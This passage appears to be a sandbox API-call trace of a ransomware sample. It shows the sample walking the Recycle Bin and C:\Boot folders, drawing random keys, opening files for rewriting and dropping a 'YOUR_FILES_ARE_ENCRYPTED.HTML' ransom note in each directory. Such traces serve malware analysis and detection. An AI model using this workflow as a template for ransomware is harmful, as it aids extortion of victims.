ftLastWriteTime.dwLowDateTime=0x913b261b, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x620d28, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0104.466] StrStrIW (lpFirst="desktop.ini", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.466] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-1560258661-3990802383-1811730007-1000\\desktop.ini") returned 78 [0104.466] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0104.466] lstrlenW (lpString=".ini") returned 4 [0104.466] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0104.466] SystemFunction036 (in: RandomBuffer=0x19f0d0, RandomBufferLength=0x20 | out: RandomBuffer=0x19f0d0) returned 1 [0104.466] CreateFileW (lpFileName="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-1560258661-3990802383-1811730007-1000\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-21-1560258661-3990802383-1811730007-1000\\desktop.ini"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x304 [0104.467] GetFileSizeEx (in: hFile=0x304, lpFileSize=0x19f0f4 | out: lpFileSize=0x19f0f4*=129) returned 1 [0104.467] CloseHandle (hObject=0x304) returned 1 [0104.467] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x913b261b, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x913b261b, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x913b261b, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x620d28, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0104.467] FindClose (in: hFindFile=0x626cf8 | out: hFindFile=0x626cf8) returned 1 [0104.467] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-1560258661-3990802383-1811730007-1000\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 96 [0104.467] GetProcessHeap () returned 0x600000 [0104.467] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x680348 [0104.467] CreateFileW (lpFileName="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-1560258661-3990802383-1811730007-1000\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\$recycle.bin\\s-1-5-21-1560258661-3990802383-1811730007-1000\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0104.468] WriteFile (in: hFile=0x300, lpBuffer=0x680348*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f3f4, lpOverlapped=0x0 | out: lpBuffer=0x680348*, lpNumberOfBytesWritten=0x19f3f4*=0x3c00, lpOverlapped=0x0) returned 1 [0104.469] CloseHandle (hObject=0x300) returned 1 [0104.469] GetProcessHeap () returned 0x600000 [0104.469] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x680348 | out: hHeap=0x600000) returned 1 [0104.469] GetProcessHeap () returned 0x600000 [0104.469] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0104.473] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19f43c | out: lpFindFileData=0x19f43c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x913b261b, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x913b261b, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x913b261b, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x57e5177c, dwReserved1=0x130, cFileName="S-1-5-21-1560258661-3990802383-1811730007-1000", cAlternateFileName="S-1-5-~1")) returned 0 [0104.473] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0104.473] wnsprintfW (in: pszDest=0x660338, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\$Recycle.Bin\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 49 [0104.473] GetProcessHeap () returned 0x600000 [0104.473] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x670340 [0104.473] CreateFileW (lpFileName="\\\\?\\C:\\$Recycle.Bin\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\$recycle.bin\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc [0104.474] WriteFile (in: hFile=0x2fc, lpBuffer=0x670340*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f708, lpOverlapped=0x0 | out: lpBuffer=0x670340*, lpNumberOfBytesWritten=0x19f708*=0x3c00, lpOverlapped=0x0) returned 1 [0104.475] CloseHandle (hObject=0x2fc) returned 1 [0104.476] GetProcessHeap () returned 0x600000 [0104.476] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0104.476] GetProcessHeap () returned 0x600000 [0104.476] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x660338 | out: hHeap=0x600000) returned 1 [0104.477] FindNextFileW (in: hFindFile=0x6269f8, lpFindFileData=0x19f750 | out: lpFindFileData=0x19f750*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x7898476d, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78b27f82, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78b27f82, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19f7ac, cFileName="Boot", cAlternateFileName="")) returned 1 [0104.477] StrStrIW (lpFirst="Boot", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.477] wnsprintfW (in: pszDest=0x650330, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot") returned 11 [0104.477] GetProcessHeap () returned 0x600000 [0104.477] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x660338 [0104.478] lstrcpyW (in: lpString1=0x660338, lpString2="\\\\?\\C:\\Boot" | out: lpString1="\\\\?\\C:\\Boot") returned="\\\\?\\C:\\Boot" [0104.478] lstrcatW (in: lpString1="\\\\?\\C:\\Boot", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Boot\\*") returned="\\\\?\\C:\\Boot\\*" [0104.478] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\*", lpFindFileData=0x19f43c | out: lpFindFileData=0x19f43c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x7898476d, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78b74525, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78b74525, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x57e5177c, dwReserved1=0x130, cFileName=".", cAlternateFileName="")) returned 0x626738 [0104.478] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19f43c | out: lpFindFileData=0x19f43c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x7898476d, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78b74525, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78b74525, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x57e5177c, dwReserved1=0x130, cFileName="..", cAlternateFileName="")) returned 1 [0104.480] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19f43c | out: lpFindFileData=0x19f43c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78b74525, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x93feaf64, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x93feaf64, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x6000, dwReserved0=0x57e5177c, dwReserved1=0x130, cFileName="BCD", cAlternateFileName="")) returned 1 [0104.480] StrStrIW (lpFirst="BCD", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.480] wnsprintfW (in: pszDest=0x660338, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\BCD") returned 15 [0104.480] PathFindExtensionW (pszPath="BCD") returned="" [0104.480] lstrlenW (lpString="") returned 0 [0104.480] PathFindExtensionW (pszPath="BCD") returned="" [0104.480] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19f43c | out: lpFindFileData=0x19f43c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x78b74525, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78b74525, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78b74525, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x8000, dwReserved0=0x57e5177c, dwReserved1=0x130, cFileName="BCD.LOG", cAlternateFileName="")) returned 1 [0104.480] StrStrIW (lpFirst="BCD.LOG", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.480] wnsprintfW (in: pszDest=0x660338, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\BCD.LOG") returned 19 [0104.480] PathFindExtensionW (pszPath="BCD.LOG") returned=".LOG" [0104.480] lstrlenW (lpString=".LOG") returned 4 [0104.480] PathFindExtensionW (pszPath="BCD.LOG") returned=".LOG" [0104.480] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19f43c | out: lpFindFileData=0x19f43c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x78b74525, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78b74525, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78b74525, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x57e5177c, dwReserved1=0x130, cFileName="BCD.LOG1", cAlternateFileName="BCD~1.LOG")) returned 1 [0104.480] StrStrIW (lpFirst="BCD.LOG1", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.480] wnsprintfW (in: pszDest=0x660338, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\BCD.LOG1") returned 20 [0104.480] PathFindExtensionW (pszPath="BCD.LOG1") returned=".LOG1" [0104.480] lstrlenW (lpString=".LOG1") returned 5 [0104.480] PathFindExtensionW (pszPath="BCD.LOG1") returned=".LOG1" [0104.480] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19f43c | out: lpFindFileData=0x19f43c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x78b74525, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78b74525, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78b74525, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x57e5177c, dwReserved1=0x130, cFileName="BCD.LOG2", cAlternateFileName="BCD~2.LOG")) returned 1 [0104.480] StrStrIW (lpFirst="BCD.LOG2", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.480] wnsprintfW (in: pszDest=0x660338, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\BCD.LOG2") returned 20 [0104.480] PathFindExtensionW (pszPath="BCD.LOG2") returned=".LOG2" [0104.480] lstrlenW (lpString=".LOG2") returned 5 [0104.480] PathFindExtensionW (pszPath="BCD.LOG2") returned=".LOG2" [0104.480] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19f43c | out: lpFindFileData=0x19f43c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7898476d, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x7898476d, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x7898476d, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x57e5177c, dwReserved1=0x130, cFileName="bg-BG", cAlternateFileName="")) returned 1 [0104.480] StrStrIW (lpFirst="bg-BG", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.480] wnsprintfW (in: pszDest=0x660338, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\bg-BG") returned 17 [0104.480] GetProcessHeap () returned 0x600000 [0104.480] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x671348 [0104.481] lstrcpyW (in: lpString1=0x671348, lpString2="\\\\?\\C:\\Boot\\bg-BG" | out: lpString1="\\\\?\\C:\\Boot\\bg-BG") returned="\\\\?\\C:\\Boot\\bg-BG" [0104.481] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\bg-BG", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Boot\\bg-BG\\*") returned="\\\\?\\C:\\Boot\\bg-BG\\*" [0104.481] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\bg-BG\\*", lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7898476d, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x7898476d, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x7898476d, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x622620, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6265f8 [0104.481] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7898476d, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x7898476d, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x7898476d, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x622620, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0104.481] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7898476d, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x7898476d, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x210bba74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12f60, dwReserved0=0x622620, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0104.481] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.481] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\bg-BG\\bootmgr.exe.mui") returned 33 [0104.482] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0104.482] lstrlenW (lpString=".mui") returned 4 [0104.482] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0104.482] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7898476d, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x7898476d, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x210bba74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12f60, dwReserved0=0x622620, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0104.482] FindClose (in: hFindFile=0x6265f8 | out: hFindFile=0x6265f8) returned 1 [0104.482] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\bg-BG\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 47 [0104.482] GetProcessHeap () returned 0x600000 [0104.482] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x681350 [0104.482] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\bg-BG\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\boot\\bg-bg\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0104.482] WriteFile (in: hFile=0x300, lpBuffer=0x681350*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f3f4, lpOverlapped=0x0 | out: lpBuffer=0x681350*, lpNumberOfBytesWritten=0x19f3f4*=0x3c00, lpOverlapped=0x0) returned 1 [0104.484] CloseHandle (hObject=0x300) returned 1 [0104.484] GetProcessHeap () returned 0x600000 [0104.484] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x681350 | out: hHeap=0x600000) returned 1 [0104.484] GetProcessHeap () returned 0x600000 [0104.484] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x671348 | out: hHeap=0x600000) returned 1 [0104.485] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19f43c | out: lpFindFileData=0x19f43c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x78ab5a49, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78ab5a49, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78ab5a49, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x57e5177c, dwReserved1=0x130, cFileName="BOOTSTAT.DAT", cAlternateFileName="")) returned 1 [0104.485] StrStrIW (lpFirst="BOOTSTAT.DAT", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.485] wnsprintfW (in: pszDest=0x660338, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\BOOTSTAT.DAT") returned 24 [0104.485] PathFindExtensionW (pszPath="BOOTSTAT.DAT") returned=".DAT" [0104.485] lstrlenW (lpString=".DAT") returned 4 [0104.485] PathFindExtensionW (pszPath="BOOTSTAT.DAT") returned=".DAT" [0104.485] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19f43c | out: lpFindFileData=0x19f43c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789aa98c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789aa98c, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x2feb42d5, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x17f60, dwReserved0=0x57e5177c, dwReserved1=0x130, cFileName="bootvhd.dll", cAlternateFileName="")) returned 1 [0104.485] StrStrIW (lpFirst="bootvhd.dll", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.485] wnsprintfW (in: pszDest=0x660338, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\bootvhd.dll") returned 23 [0104.485] PathFindExtensionW (pszPath="bootvhd.dll") returned=".dll" [0104.485] lstrlenW (lpString=".dll") returned 4 [0104.485] PathFindExtensionW (pszPath="bootvhd.dll") returned=".dll" [0104.485] SystemFunction036 (in: RandomBuffer=0x19f3e4, RandomBufferLength=0x20 | out: RandomBuffer=0x19f3e4) returned 1 [0104.485] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\bootvhd.dll" (normalized: "c:\\boot\\bootvhd.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0104.485] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19f43c | out: lpFindFileData=0x19f43c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789aa98c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789aa98c, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789aa98c, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x57e5177c, dwReserved1=0x130, cFileName="cs-CZ", cAlternateFileName="")) returned 1 [0104.485] StrStrIW (lpFirst="cs-CZ", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.485] wnsprintfW (in: pszDest=0x660338, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\cs-CZ") returned 17 [0104.485] GetProcessHeap () returned 0x600000 [0104.485] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x671348 [0104.486] lstrcpyW (in: lpString1=0x671348, lpString2="\\\\?\\C:\\Boot\\cs-CZ" | out: lpString1="\\\\?\\C:\\Boot\\cs-CZ") returned="\\\\?\\C:\\Boot\\cs-CZ" [0104.486] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\cs-CZ", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Boot\\cs-CZ\\*") returned="\\\\?\\C:\\Boot\\cs-CZ\\*" [0104.486] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\cs-CZ\\*", lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789aa98c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789aa98c, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789aa98c, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19f200, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0104.486] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789aa98c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789aa98c, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789aa98c, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="..", cAlternateFileName="")) returned 1 [0104.486] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789aa98c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789aa98c, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x2109581d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12b58, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0104.487] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.487] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 33 [0104.487] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0104.487] lstrlenW (lpString=".mui") returned 4 [0104.487] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0104.487] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789aa98c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789aa98c, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x2112e17f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb160, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0104.487] StrStrIW (lpFirst="memtest.exe.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.487] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\cs-CZ\\memtest.exe.mui") returned 33 [0104.487] PathFindExtensionW (pszPath="memtest.exe.mui") returned=".mui" [0104.487] lstrlenW (lpString=".mui") returned 4 [0104.487] PathFindExtensionW (pszPath="memtest.exe.mui") returned=".mui" [0104.487] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789aa98c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789aa98c, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x2112e17f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb160, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0104.487] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0104.487] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\cs-CZ\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 47 [0104.487] GetProcessHeap () returned 0x600000 [0104.487] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x681350 [0104.487] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\cs-CZ\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\boot\\cs-cz\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0104.489] WriteFile (in: hFile=0x300, lpBuffer=0x681350*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f3f4, lpOverlapped=0x0 | out: lpBuffer=0x681350*, lpNumberOfBytesWritten=0x19f3f4*=0x3c00, lpOverlapped=0x0) returned 1 [0104.489] CloseHandle (hObject=0x300) returned 1 [0104.490] GetProcessHeap () returned 0x600000 [0104.490] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x681350 | out: hHeap=0x600000) returned 1 [0104.490] GetProcessHeap () returned 0x600000 [0104.490] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x671348 | out: hHeap=0x600000) returned 1 [0104.492] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19f43c | out: lpFindFileData=0x19f43c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789aa98c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789aa98c, 